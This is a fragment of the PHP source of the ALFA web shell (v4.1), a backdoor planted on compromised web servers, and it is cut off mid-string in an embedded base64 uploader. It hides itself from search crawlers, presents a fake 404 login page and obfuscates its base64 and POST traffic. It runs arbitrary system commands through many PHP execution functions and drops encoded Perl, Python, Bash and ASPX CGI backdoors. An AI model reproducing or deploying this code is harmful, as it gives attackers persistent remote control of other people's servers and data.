$b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
$ac = 0;
$enc = '';
$tmp_arr = array();
if (!$data){
return $data;
}do{
$o1 = $aztJtafUXm($data, $i++);
$o2 = $aztJtafUXm($data, $i++);
$o3 = $aztJtafUXm($data, $i++);
$bits = $o1 << 16 | $o2 << 8 | $o3;
$h1 = $bits >> 18 & 0x3f;
$h2 = $bits >> 12 & 0x3f;
$h3 = $bits >> 6 & 0x3f;
$h4 = $bits & 0x3f;
$tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
}
while ($i < strlen($data));
$enc = implode($tmp_arr, '');
$r = (strlen($data) % 3);
return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
}
function charCodeAt($data, $char){
return ord(substr($data, $char, 1));
}
function charAt($data, $char){
return substr($data, $char, 1);
}
}else{
function vcnvSCZgBz($s){
$b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
return $b($s);
}
}
if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '')){
function zRtSHsbTzV($input){
if (empty($input)) return;
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do{
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr((int)$chr1);
if ($enc3 != 64){
$output = $output . chr((int)$chr2);
}
if ($enc4 != 64){
$output = $output . chr((int)$chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
}
while ($i < strlen($input));
return $output;
}
}else{
function zRtSHsbTzV($s){
$b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
return $b($s);
}
}

function __ZW5jb2Rlcg($s)
{
return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s)
{
return zRtSHsbTzV($s);
}

$GLOBALS['DB_NAME'] = $GLOBALS['ayAHGSshXn'];

foreach ($GLOBALS['DB_NAME'] as $key => $value){
$prefix = substr($key, 0, 2);
if ($prefix == "us")
{
$GLOBALS['DB_NAME']["user"] = $value;
$GLOBALS['DB_NAME']["user_rand"] = $key;
}
elseif ($prefix == "pa")
{
$GLOBALS['DB_NAME']["pass"] = $value;
$GLOBALS['DB_NAME']["pass_rand"] = $key;
}
elseif ($prefix == "sa")
{
$GLOBALS['DB_NAME']["safemode"] = $value;
$GLOBALS['DB_NAME']["safemode_rand"] = $key;
}
elseif ($prefix == "lo")
{
$GLOBALS['DB_NAME']["login_page"] = $value;
$GLOBALS['DB_NAME']["login_page_rand"] = $key;
}
elseif ($prefix == "sh")
{
$GLOBALS['DB_NAME']["show_icons"] = $value;
$GLOBALS['DB_NAME']["show_icons_rand"] = $key;
}
elseif ($prefix == "po")
{
$GLOBALS['DB_NAME']["post_encryption"] = $value;
$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
}
elseif ($prefix == "cg")
{
$GLOBALS['DB_NAME']["cgi_api"] = $value;
$GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
}
}

unset($GLOBALS['ayAHGSshXn']);

if (!isset($_SERVER["HTTP_HOST"])) exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
define("__ALFA_VERSION__", "4.1");
define("__ALFA_UPDATE__", "2");
define("__ALFA_CODE_NAME__", "XXVI");
define("__ALFA_DATA_FOLDER__", "jancox");
define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
$GLOBALS['__ALFA_COLOR__'] = array(
"shell_border" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
".header" => "border: 7px solid {color}",
"#meunlist" => "border-color: {color}",
"#hidden_sh" => "background-color: {color}",
".ajaxarea" => "border: 1px solid {color}",
".foot" => "border-color: {color}",
)
),
"header_vars" => "#27979B",
"header_values" => "#67ABDF",
"header_on" => "#00FF00",
"header_off" => "#ff0000",
"header_none" => "#00FF00",
"home_shell" => "#ff0000",
"home_shell:hover" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".home_shell:hover" => "color: {color};",
)
),
"back_shell" => "#efbe73",
"back_shell:hover" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".back_shell:hover" => "color: {color};",
)
),
"header_pwd" => "#00FF00",
"header_pwd:hover" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".header_pwd:hover" => "color: {color};",
)
),
"header_drive" => "#00FF00",
"header_drive:hover" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".header_drive:hover" => "color: {color};",
)
),
"header_show_all" => "#00FF00",
"disable_functions" => "#ff0000",
"footer_text" => "#27979B",
"menu_options" => "#27979B",
"menu_options:hover" => array(
"key_color" => "#646464",
"multi_selector" => array(
".menu_options:hover" => "background-color: {color};font-weight: unset;",
)
),
"options_list" => array(
"key_color" => "#00FF00",
"multi_selector" => array(
".content_options_holder .header center a" => "color: {color};",
)
),
"options_list:hover" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".content_options_holder .header center a:hover" => "color: {color};",
)
),
"options_list_header" => array(
"key_color" => "#59cc33",
"multi_selector" => array(
".txtfont_header" => "color: {color};",
)
),
"options_list_text" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".txtfont,.tbltxt" => "color: {color};",
)
),
"Alfa+" => array(
"key_color" => "#06ff0f",
"multi_selector" => array(
".alfa_plus" => "color: {color};font-weight: unset;",
)
),
"hidden_shell_text" => array(
"key_color" => "#00FF00",
"multi_selector" => array(
"#hidden_sh a" => "color: {color};",
)
),
"hidden_shell_version" => "#ff0000",
"shell_name" => "#FF0000",
"main_row:hover" => array(
"key_color" => "#646464",
"multi_selector" => array(
".main tr:hover" => "background-color: {color};",
)
),
"main_header" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".main th" => "color: {color};",
)
),
"main_name" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".main .main_name" => "color: {color};font-weight: unset;",
)
),
"main_size" => "#67ABDF",
"main_modify" => "#67ABDF",
"main_owner_group" => "#67ABDF",
"main_green_perm" => "#25ff00",
"main_red_perm" => "#FF0000",
"main_white_perm"=> "#FFFFFF",
"beetween_perms" => "#FFFFFF",
"main_actions" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".main .actions" => "color: {color};",
)
),
"menu_options:hover" => array(
"key_color" => "#646464",
"multi_selector" => array(
".menu_options:hover" => "background-color: {color};font-weight: unset;",
)
),
"minimize_editor_background" => array(
"key_color" => "#0e304a",
"multi_selector" => array(
".minimized-wrapper" => "background-color: {color};",
)
),
"minimize_editor_text" => array(
"key_color" => "#f5deb3",
"multi_selector" => array(
".minimized-text" => "color: {color};",
)
),
"editor_border" => array(
"key_color" => "#0e304a",
"multi_selector" => array(
".editor-explorer,.editor-modal" => "border: 2px solid {color};",
)
),
"editor_background" => array(
"key_color" => "rgba(0, 1, 23, 0.94)",
"multi_selector" => array(
".editor-explorer,.editor-modal" => "background-color: {color};",
)
),
"editor_header_background" => array(
"key_color" => "rgba(21, 66, 88, 0.93)",
"multi_selector" => array(
".editor-header" => "background-color: {color};",
)
),
"editor_header_text" => array(
"key_color" => "#00ff7f",
"multi_selector" => array(
".editor-path" => "color: {color};",
)
),
"editor_header_button" => array(
"key_color" => "#1d5673",
"multi_selector" => array(
".close-button, .editor-minimize" => "background-color: {color};",
)
),
"editor_actions" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".editor_actions" => "color: {color};",
)
),
"editor_file_info_vars" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".editor_file_info_vars" => "color: {color};",
)
),
"editor_file_info_values" => array(
"key_color" => "#67ABDF",
"multi_selector" => array(
".filestools" => "color: {color};",
)
),
"editor_history_header" => array(
"key_color" => "#14ff07",
"multi_selector" => array(
".hheader-text,.history-clear" => "color: {color};",
)
),
"editor_history_list" => array(
"key_color" => "#03b3a3",
"multi_selector" => array(
".editor-file-name" => "color: {color};",
)
),
"editor_history_selected_file" => array(
"key_color" => "rgba(49, 55, 93, 0.77)",
"multi_selector" => array(
".is_active" => "background-color: {color};",
)
),
"editor_history_file:hover" => array(
"key_color" => "#646464",
"multi_selector" => array(
".file-holder > .history:hover" => "background-color: {color};",
)
),
"input_box_border" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
"input[type=text],textarea" => "border: 1px solid {color}",
)
),
"input_box_text" => array(
"key_color" => "#999999",
"multi_selector" => array(
"input[type=text],textarea" => "color: {color};",
)
),
"input_box:hover" => array(
"key_color" => "#27979B",
"multi_selector" => array(
"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
)
),
"select_box_border" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
"select" => "border: 1px solid {color}",
)
),
"select_box_text" => array(
"key_color" => "#FFFFEE",
"multi_selector" => array(
"select" => "color: {color};",
)
),
"select_box:hover" => array(
"key_color" => "#27979B",
"multi_selector" => array(
"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
)
),
"button_border" => array(
"key_color" => "#27979B",
"multi_selector" => array(
"input[type=submit],.button,#addup" => "border: 1px solid {color};",
)
),
"button:hover" => array(
"key_color" => "#27979B",
"multi_selector" => array(
"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
)
),
"outputs_text" => array(
"key_color" => "#67ABDF",
"multi_selector" => array(
".ml1" => "color: {color};",
)
),
"outputs_border" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
".ml1" => "border: 1px solid {color};",
)
),
"uploader_border" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
)
),
"uploader_background" => array(
"key_color" => "#0E304A",
"multi_selector" => array(
".inputfile strong" => "background-color: {color};",
)
),
"uploader_text_right" => array(
"key_color" => "#FFFFFF",
"multi_selector" => array(
".inputfile strong" => "color: {color};",
)
),
"uploader_text_left" => array(
"key_color" => "#25ff00",
"multi_selector" => array(
".inputfile span" => "color: {color};",
)
),
"uploader:hover" => array(
"key_color" => "#27979B",
"multi_selector" => array(
".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
)
),
"uploader_progress_bar" => array(
"key_color" => "#00ff00",
"multi_selector" => array(
".up_bar" => "background-color: {color};",
)
),
"mysql_tables" => "#00FF00",
"mysql_table_count" => "#67ABDF",
"copyright" => "#dfff00",
"scrollbar" => array(
"key_color" => "#1e82b5",
"multi_selector" => array(
"*::-webkit-scrollbar-thumb" => "background-color: {color};",
)
),
"scrollbar_background" => array(
"key_color" => "#000115",
"multi_selector" => array(
"*::-webkit-scrollbar-track" => "background-color: {color};",
)
),
);
$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
//@session_start();
@session_write_close();
@ignore_user_abort(true);
@set_time_limit(0);
@ini_set('memory_limit', '-1');
@ini_set("upload_max_filesize", "9999m");
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
if($config['AlfaLoginPage']=='404'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.(ehsan)</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}}}
function decrypt_post($str){
if(__ALFA_POST_ENCRYPTION__){
$pwd = __ALFA_SECRET_KEY__;
$pwd = __ZW5jb2Rlcg($pwd);
$str = __ZGVjb2Rlcg($str);
$enc_chr = "";
$enc_str = "";
$i   = 0;
while ($i < strlen($str)) {
for ($j = 0; $j < strlen($pwd); $j++) {
$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
$enc_str .= $enc_chr;
$i++;
if ($i >= strlen($str))
break;
}
}
return __ZGVjb2Rlcg($enc_str);
}else{
return __ZGVjb2Rlcg($str);
}
}

function _AlfaSecretKey(){
$secret = @$_COOKIE["AlfaSecretKey"];
if(!isset($_COOKIE["AlfaSecretKey"])){
$secret = uniqid(mt_rand(), true);
__alfa_set_cookie("AlfaSecretKey", $secret);
}
return $secret;
}
function alfa_getColor($target){
if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
return $GLOBALS["DB_NAME"]["color"][$target];
}else{
$target = $GLOBALS["__ALFA_COLOR__"][$target];
if(is_array($target)){
return $target["key_color"];
}else{
return $target;
}
}
}
function alfaCssLoadColors(){
$css = "";
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
if(!is_array($value)){
$value = alfa_getColor($key);
$css .= ".{$key}{color: {$value};}";
}else{
if(isset($value["multi_selector"])){
foreach($value["multi_selector"] as $k => $v){
$color = alfa_getColor($key);
$code = str_replace("{color}", $color, $v);
$css .=  $k."{".$code."}";
}
}
}
}
return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}}
function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
if(!$GLOBALS["DB_NAME"]["cgi_api"]){
return "";
}
if(isset($_COOKIE["alfacgiapi_mode"])){
return "";
}
$cmd_pure = $cmd;
$is_curl = function_exists('curl_version');
$is_socket = function_exists('fsockopen');
if($is_curl||$is_socket){
$recreate = false;
if(isset($_COOKIE["alfacgiapi"])){
if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
$recreate = true;
$lang = $_COOKIE["alfacgiapi"];
}
}
if(!isset($_COOKIE["alfacgiapi"])||$recreate){
@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
$perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
$bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
$aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
if($lang == "aspx"){
alfaWriteTocgiapi("aspx.aspx",$aspx);
}else{
alfaWriteTocgiapi($lang.".alfa",$source);
}
alfacgihtaccess('cgi', "alfacgiapi/");
}else{
$lang = $_COOKIE["alfacgiapi"];
}
$cgi_ext = ".alfa";
if($lang=="aspx"){
$cgi_ext = ".aspx";
}
$cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext;
$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
if($is_curl){
$address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
$post = new AlfaCURL();
$data = $post->Send($address, "post", $cmd);
}elseif($is_socket){
$server = $_SERVER["SERVER_NAME"];
$uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
$data = _alfa_fsockopen($server,$uri,$cmd);
}
$out = "";
if(strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]<pre>"+output+"</pre>') === false){
if($set_cookie){
__alfa_set_cookie("alfacgiapi", $lang);
}
if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
$out = $res[1];
}
}elseif($lang=="perl"){
return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
}elseif($lang=="py"){
return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
}elseif($lang=="bash" && $GLOBALS['sys']=="win"){
return _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);
}else{
if($set_cookie){
__alfa_set_cookie("alfacgiapi_mode", "off");
}
}
return trim($out);
}else{
return "";
}
}
function alfaGetCwd(){
if(function_exists("getcwd")){
return @getcwd();
}else{
return dirname($_SERVER["SCRIPT_FILENAME"]);
}
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
$data = _alfa_php_cmd($in,$re);
if(empty($data)&&$cgi||$all){
if($GLOBALS['sys']=='unix'){
if(strlen(_alfa_php_cmd("whoami"))==0||$all){
$cmd = _alfa_cgicmd($in);
if(!empty($cmd)){
return $cmd;
}
}
}
}
return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
$socket = @fsockopen($server, 80, $errno, $errstr, 15);
if($socket){
$http  = "POST {$uri} HTTP/1.0\r\n";
$http .= "Host: {$server}\r\n";
$http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http .= "Content-length: " . strlen($post) . "\r\n";
$http .= "Connection: close\r\n\r\n";
$http .= $post . "\r\n\r\n";
fwrite($socket, $http);
$contents = "";
while (!@feof($socket)) {
$contents .= @fgets($socket, 4096);
}
list($header, $body) = explode("\r\n\r\n", $contents, 2);
@fclose($socket);
return $body;
}else{
return "";
}
}
foreach($_POST as $key => $value){
if(is_array($_POST[$key])){
$i=0;
foreach($_POST[$key] as $f) {
$f = trim(str_replace(' ', '+',$f));
$_POST[$key][$i] = decrypt_post($f);
$i++;
}
}else{
$value = trim(str_replace(' ', '+',$value));
$_POST[$key] = decrypt_post($value);
}
}
$default_action = 'FilesMan2';//'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(strtolower(substr(PHP_OS,0,3))=="win")
$GLOBALS['sys']='win';
else
$GLOBALS['sys']='unix';
$GLOBALS['home_cwd'] = @alfaGetCwd();
$GLOBALS["need_to_update_header"] = "false";
$GLOBALS['glob_chdir_false'] = false;
if(isset($_POST['c'])){
if(!@chdir($_POST['c'])){
$GLOBALS['glob_chdir_false'] = true;
}
}
$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
if($GLOBALS['glob_chdir_false']){
$GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
}
if($GLOBALS['sys'] == 'win'){
$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
}
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
if(!function_exists("mb_strlen")){
function mb_strlen($str, $c=""){
return strlen($str);
}
}
if(!function_exists("mb_substr")){
function mb_substr($str, $start, $end, $c=""){
return substr($str, $start, $end);
}
}
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
function alfahead(){
$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7